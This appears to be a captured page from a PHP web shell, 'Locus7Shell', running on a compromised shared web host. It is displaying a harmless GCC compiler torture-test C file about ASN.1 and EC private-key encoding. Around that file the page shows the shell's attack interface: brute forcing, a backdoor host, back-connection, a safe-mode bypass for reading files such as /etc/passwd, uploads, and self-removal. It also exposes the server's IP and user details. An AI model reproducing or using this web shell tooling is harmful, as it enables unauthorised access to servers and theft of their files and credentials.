Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.c-torture/compile/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pr53886.c (1.4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* PR target/53886  */
typedef struct asn1_string_st ASN1_BIT_STRING;
typedef struct bignum_st BIGNUM;
typedef struct ec_group_st EC_GROUP;
typedef struct ec_key_st EC_KEY;

struct ec_key_st
{
  EC_GROUP *group;
  BIGNUM *priv_key;
  unsigned int enc_flag;
}
X9_62_PENTANOMIAL;
typedef struct ec_privatekey_st
{
  ASN1_BIT_STRING *publicKey;
}
EC_PRIVATEKEY;

extern EC_PRIVATEKEY* EC_PRIVATEKEY_new (void);
extern void EC_PRIVATEKEY_free (EC_PRIVATEKEY*);
extern unsigned char* CRYPTO_realloc (char*,int,const char*,int);

int
i2d_ECPrivateKey (EC_KEY * a, unsigned char **out)
{
  int ret = 0, ok = 0;
  unsigned char *buffer = 0;
  unsigned buf_len = 0, tmp_len;
  EC_PRIVATEKEY *priv_key = 0;
  if (a == 0 || a->group == 0 || a->priv_key == 0)
    {
      ERR_put_error (16, (192), ((3 | 64)),
             "",
             1234);
      goto err;
    }
  if ((priv_key = EC_PRIVATEKEY_new ()) == 0)
    {
      ERR_put_error (16, (192), ((1 | 64)),
             "",
             1241);
      goto err;
    }
  if (!(a->enc_flag & 0x002))
    {
      if (priv_key->publicKey == 0)
    {
      goto err;
    }
      if (tmp_len > buf_len)
    {
      unsigned char *tmp_buffer =
        CRYPTO_realloc ((char *) buffer, (int) tmp_len, "", 1293);
      buffer = tmp_buffer;
    }
    }
  if ((ret = i2d_EC_PRIVATEKEY (priv_key, out)) == 0)
    {
    }
  ok = 1;
err:
  if (buffer)
    CRYPTO_free (buffer);
  if (priv_key)
    EC_PRIVATEKEY_free (priv_key);
  return (ok ? ret : 0);
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0063 ]--